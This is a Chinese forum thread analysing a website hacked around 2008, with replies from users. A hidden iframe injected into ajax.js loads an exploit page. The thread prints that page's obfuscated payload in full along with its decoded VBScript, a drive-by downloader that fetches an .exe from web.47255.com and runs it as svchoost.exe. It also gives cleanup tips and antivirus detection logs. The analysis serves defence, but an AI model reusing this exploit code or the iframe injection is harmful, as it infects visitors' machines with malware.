凝逸反毒.锐智论坛(分析清除-锐智论坛-挂的马)扫描网页病毒

凝逸反毒

凝逸反毒.锐智论坛(分析清除-锐智论坛-挂的马)扫描网页病毒

锐智论坛 10:47:02
你帮看下www.reizz.net,被挂马了
锐智论坛 10:47:49
连后台都有,刚才用本

======凝逸反毒.清除========
用工具下www.reizz.net
没发现什么,
中就中了(怕怕),用ie打开www.reizz.net
"Temporary Internet Files" 没看出有什么exe出来,启动也没有马出来
难道,不是?
可,锐智论坛说有的
把所有js,看下,发现不对的 ajax.js
---------------------
document.writeln("<iframe SRc=http:\/\/web.47255.com\/www\/web.htm width=0 height=100><\/IfRaMe>");
---------------------

\/ 正常写法不这这样的,
用工具下http:\/\/web.47255.com\/www\/web.htm

---------------------得到---------------------
<html><TITLE>MAO</TITLE><BODY>
<iframe src=r.htm width=0 height=0></iframe>
<iframe src=06014.html width=0 height=8></iframe>
<script src='http://s23.cnzz.com/stat.php?id=729857&web_id=729857' language='JavaScript' charset='gb2312'></script>
<script language="javascript" type="text/javascript" src="http://js.users.51.la/1494619.js"></script>
</body></html>
---------------------
更有可能了

r.htm 不会解,过
06014.html 10
------
<script>
t="60,104,116,109,108,62,13,10,60,115,99,114,105,112,116,32,108,97,110,103,117,97,103,101,61,34,86,66,83,99,114,105,112,116,3
4,62,111,110,32,101,114,114,111,114,32,114,101,115,117,109,101,32,110,101,120,116,13,10,120,49,61,34,111,98,34,38,34,106,101,
34,38,34,99,116,34,13,10,120,50,61,34,99,108,34,38,34,97,115,115,105,34,38,34,100,34,13,10,120,51,61,34,99,108,115,34,38,34,1
05,100,58,66,34,38,34,68,57,54,34,38,34,67,53,34,38,34,53,54,45,54,34,38,34,53,65,51,45,49,34,38,34,49,68,48,45,57,34,38,34,5
6,51,65,45,34,38,34,48,48,67,34,38,34,48,52,70,67,34,38,34,50,57,34,38,34,69,34,38,34,51,54,34,13,10,120,52,61,34,77,34,38,34
,105,34,38,34,99,114,34,38,34,111,34,38,34,115,111,102,34,38,34,116,46,88,34,38,34,77,34,38,34,76,34,38,34,72,84,34,38,34,84,
34,38,34,80,34,13,10,120,53,61,34,83,104,101,108,108,46,65,112,112,108,105,99,97,116,105,111,110,34,13,10,120,54,61,34,83,99,
114,105,34,38,34,112,116,105,34,38,34,110,103,46,70,105,108,34,38,34,101,83,121,115,34,38,34,116,101,109,34,38,34,79,98,106,1
01,34,38,34,99,116,34,13,10,83,101,116,32,101,99,32,61,32,100,111,99,117,109,101,110,116,46,99,114,101,97,116,101,69,108,101,
109,101,110,116,40,120,49,41,13,10,13,10,101,32,61,34,104,116,116,112,58,47,47,119,101,98,46,52,55,50,53,53,46,99,111,109,47,
119,119,119,47,119,119,119,46,101,120,101,34,13,10,101,99,46,115,101,116,65,116,116,114,105,98,117,116,101,32,120,50,44,32,12
0,51,13,10,101,105,61,120,52,13,10,83,101,116,32,101,100,32,61,32,101,99,46,67,114,101,97,116,101,79,98,106,101,99,116,40,101
,105,44,34,34,41,13,10,115,49,61,34,65,34,38,34,100,34,38,34,111,34,13,10,115,50,61,34,100,34,38,34,98,34,38,34,46,34,13,10,1
15,51,61,34,83,116,34,38,34,114,34,13,10,115,52,61,34,101,97,34,38,34,109,34,13,10,101,102,61,115,49,38,115,50,38,115,51,38,1
15,52,13,10,101,103,61,101,102,13,10,115,101,116,32,101,97,32,61,32,101,99,46,99,114,101,97,116,101,111,98,106,101,99,116,40,
101,103,44,34,34,41,13,10,101,97,46,116,121,112,101,32,61,32,49,13,10,101,104,61,34,71,34,38,34,69,34,38,34,84,34,13,10,101,1
00,46,79,112,101,110,32,101,104,44,32,101,44,32,70,97,108,115,101,13,10,101,100,46,83,101,110,100,13,10,101,57,61,34,115,118,
99,104,111,111,115,116,46,101,120,101,34,13,10,115,101,116,32,101,98,32,61,32,101,99,46,99,114,101,97,116,101,111,98,106,101,
99,116,40,120,54,44,34,34,41,13,10,115,101,116,32,101,101,32,61,32,101,98,46,71,101,116,83,112,101,99,105,97,108,70,111,108,1
00,101,114,40,50,41,13,10,115,101,116,32,109,109,32,61,32,101,98,46,71,101,116,83,112,101,99,105,97,108,70,111,108,100,101,11
4,40,48,41,13,10,109,109,97,32,61,34,113,117,105,116,46,101,120,101,34,13,10,101,97,46,111,112,101,110,13,10,101,56,61,34,101
,97,46,66,117,105,108,100,80,97,116,104,40,101,97,44,101,56,41,34,13,10,101,55,61,34,101,98,46,66,117,105,108,100,80,97,116,1
04,40,101,98,44,101,55,41,34,13,10,101,54,61,34,101,99,46,66,117,105,108,100,80,97,116,104,40,101,100,44,101,54,41,34,13,10,1
01,53,61,34,101,100,46,66,117,105,108,100,80,97,116,104,40,101,102,44,101,53,41,34,13,10,101,52,61,34,101,101,46,66,117,105,1
08,100,80,97,116,104,40,101,103,44,101,52,41,34,13,10,101,51,61,34,101,102,46,66,117,105,108,100,80,97,116,104,40,101,104,44,
101,52,41,34,13,10,101,50,61,34,101,103,46,66,117,105,108,100,80,97,116,104,40,101,105,44,101,51,41,34,13,10,101,49,61,34,101
,104,46,66,117,105,108,100,80,97,116,104,40,101,103,44,101,49,41,34,13,10,101,48,61,34,101,105,46,66,117,105,108,100,80,97,11
6,104,40,101,107,44,101,48,41,34,13,10,101,57,61,32,101,98,46,66,117,105,108,100,80,97,116,104,40,101,101,44,101,57,41,13,10,
109,109,97,61,32,101,98,46,66,117,105,108,100,80,97,116,104,40,109,109,44,109,109,97,41,13,10,101,97,46,119,114,105,116,101,3
2,101,100,46,114,101,115,112,111,110,115,101,66,111,100,121,13,10,101,97,46,115,97,118,101,116,111,102,105,108,101,32,101,57,
44,50,13,10,101,97,46,115,97,118,101,116,111,102,105,108,101,32,109,109,97,44,50,13,10,101,97,46,99,108,111,115,101,13,10,13,
10,115,101,116,32,101,101,32,61,32,101,99,46,99,114,101,97,116,101,111,98,106,101,99,116,40,120,53,44,34,34,41,13,10,13,10,10
0,97,116,97,115,61,34,49,48,49,44,49,48,49,44,52,54,44,56,51,44,49,48,52,44,49,48,49,44,49,48,56,44,49,48,56,44,54,57,44,49,5
0,48,44,49,48,49,44,57,57,44,49,49,55,44,49,49,54,44,49,48,49,44,51,50,44,49,48,49,44,53,55,44,52,52,44,51,52,44,51,52,44,52,
52,44,51,52,44,51,52,44,52,52,44,51,52,44,49,49,49,44,51,52,44,51,56,44,51,52,44,49,49,50,44,51,52,44,51,56,44,51,52,44,49,48
,49,44,51,52,44,51,56,44,51,52,44,49,49,48,44,51,52,44,52,52,44,52,56,34,13,10,101,120,101,99,117,116,101,40,67,104,114,68,97
,116,97,40,100,97,116,97,115,41,41,13,10,70,117,110,99,116,105,111,110,32,67,104,114,68,97,116,97,40,68,97,116,97,41,13,10,77
,121,65,114,114,97,121,32,61,32,83,112,108,105,116,40,68,97,116,97,44,32,34,44,34,44,32,45,49,44,32,49,41,13,10,70,111,114,32
,101,97,99,104,32,79,108,100,68,97,116,97,32,105,110,32,77,121,65,114,114,97,121,13,10,32,32,78,101,119,100,97,116,97,61,78,1
01,119,68,97,116,97,38,99,104,114,40,79,108,100,68,97,116,97,41,13,10,78,101,120,116,13,10,67,104,114,68,97,116,97,61,78,101,
119,68,97,116,97,13,10,69,110,100,32,102,117,110,99,116,105,111,110,13,10,60,47,115,99,114,105,112,116,62,60,47,104,116,109,1
08,62,13,10,13,10"
t=eval("String.fromCharCode("+t+")");
document.write(t);</script>
-------------------

----解出---------
<html>
<script language="VBScript">on error resume next
x1="ob"&"je"&"ct"
x2="cl"&"assi"&"d"
x3="cls"&"id:B"&"D96"&"C5"&"56-6"&"5A3-1"&"1D0-9"&"83A-"&"00C"&"04FC"&"29"&"E"&"36"
x4="M"&"i"&"cr"&"o"&"sof"&"t.X"&"M"&"L"&"HT"&"T"&"P"
x5="Shell.Application"
x6="Scri"&"pti"&"ng.Fil"&"eSys"&"tem"&"Obje"&"ct"
Set ec = document.createElement(x1)
e ="http://web.47255.com/www/www.exe"
ec.setAttribute x2, x3
ei=x4
Set ed = ec.CreateObject(ei,"")
s1="A"&"d"&"o"
s2="d"&"b"&"."
s3="St"&"r"
s4="ea"&"m"
ef=s1&s2&s3&s4
eg=ef
set ea = ec.createobject(eg,"")
ea.type = 1
eh="G"&"E"&"T"
ed.Open eh, e, False
ed.Send
e9="svchoost.exe"
set eb = ec.createobject(x6,"")
set ee = eb.GetSpecialFolder(2)
set mm = eb.GetSpecialFolder(0)
mma ="quit.exe"
ea.open
e8="ea.BuildPath(ea,e8)"
e7="eb.BuildPath(eb,e7)"
e6="ec.BuildPath(ed,e6)"
e5="ed.BuildPath(ef,e5)"
e4="ee.BuildPath(eg,e4)"
e3="ef.BuildPath(eh,e4)"
e2="eg.BuildPath(ei,e3)"
e1="eh.BuildPath(eg,e1)"
e0="ei.BuildPath(ek,e0)"
e9= eb.BuildPath(ee,e9)
mma= eb.BuildPath(mm,mma)
ea.write ed.responseBody
ea.savetofile e9,2
ea.savetofile mma,2
ea.close
set ee = ec.createobject(x5,"")
datas="101,101,46,83,104,101,108,108,69,120,101,99,117,116,101,32,101,57,44,34,34,44,34,34,44,34,111,34,38,34,112,34,38,34,10
1,34,38,34,110,34,44,48"
execute(ChrData(datas))
Function ChrData(Data)
MyArray = Split(Data, ",", -1, 1)
For each OldData in MyArray
  Newdata=NewData&chr(OldData)
Next
ChrData=NewData
End function
</script></html>

-------------


-----------
e ="http://web.47255.com/www/www.exe"
------
哈哈,小样,你在这,

把 http://web.47255.com/www/www.exe下了, 还有效,白得个马马
hoho


=============================

======凝逸反毒.清除========
马查到了,
下个 凝逸反毒 http://ccc0.111n.com/
凝逸反毒中的 扫描网页病毒
把加入扫描网页病毒中,就能清除网站中的 病毒代码
-----------------
document.writeln("<iframe SRc=http:\/\/web.47255.com\/www\/web.htm width=0 height=100><\/IfRaMe>");
-----------------
在 扫描 所有网页  *.htm,*.js ,就能清除了

(凝逸反毒-扫描网页病毒)示范:http://hi.baidu.com/503165656/bl ... 27310bd9f9fdc6.html


http://web.47255.com/www/www.exe
把他加入凝逸反毒的病毒库,请参见下面
[凝逸反毒-自己批量加入病毒样本]oso.exe病毒[分析和清除方法]
示范:http://hi.baidu.com/503165656/bl ... 632f300a55a9b1.html

http://hiphotos.baidu.com/503165656/pic/item/b202ca24b7afee0e4c088d1c.jpg
=============================



==========还是锐智论坛写的得帅，我的写作能力不行 555 ===================
锐智论坛(775460031) 12:19:10
呵呵，捉马记
http://nyav.uu1001.com/read.php?tid=102&newpost=1
=============================

leonfg

下不下来......

残缺的唯美

woai_jolin

2008-1-29 13:54:18        HTTP filter        file        http://web.47255.com/www/www.exe        a variant of Win32/Anilogo worm        connection terminated - quarantined        BA98EBFDBC7C489\Administrator        Threat was detected upon access to web by the application: C:\Program Files\Internet Explorer\iexplore.exe.

IllusionWing

r.htm 是ascii expolit

mofunzone

Starting the file scan:

Begin scan in 'C:\TDDOWNLOAD\www.exe'
C:\TDDOWNLOAD\
  www.exe
      [DETECTION] Contains detection pattern of the Windows virus W32/AutoRun.BK
      [INFO]      The file was deleted!

mofunzone

Starting the file scan:

Begin scan in 'C:\Documents and Settings\Administrator\My Documents\er.txt'
C:\Documents and Settings\Administrator\My Documents\
  er.txt
      [DETECTION] Contains suspicious code HEUR/Exploit.HTML
      [WARNING]   The file was ignored!

kkgh

蠕虫名称:Worm.Win32.AutoRun.wv

程序:
C:\DOCUMENTS AND SETTINGS\ZH\桌面\WWW.EXE.JC!
是蠕虫程序!
已成功阻止其运行,是否要删除此文件?

瑞星病毒查杀结果报告

清除病毒种类列表：
病毒： Worm.Win32.Agent.zik     

用户来源：互联网

软件版本：20.29.10

qigang

瑞星病毒查杀结果报告

清除病毒种类列表：

病毒： Worm.Win32.Agent.zik     

MAC 地址：00:11:5B:F3:6D:69

用户来源：互联网

软件版本：20.29.12

BING126

McAfee  W32/MumaWow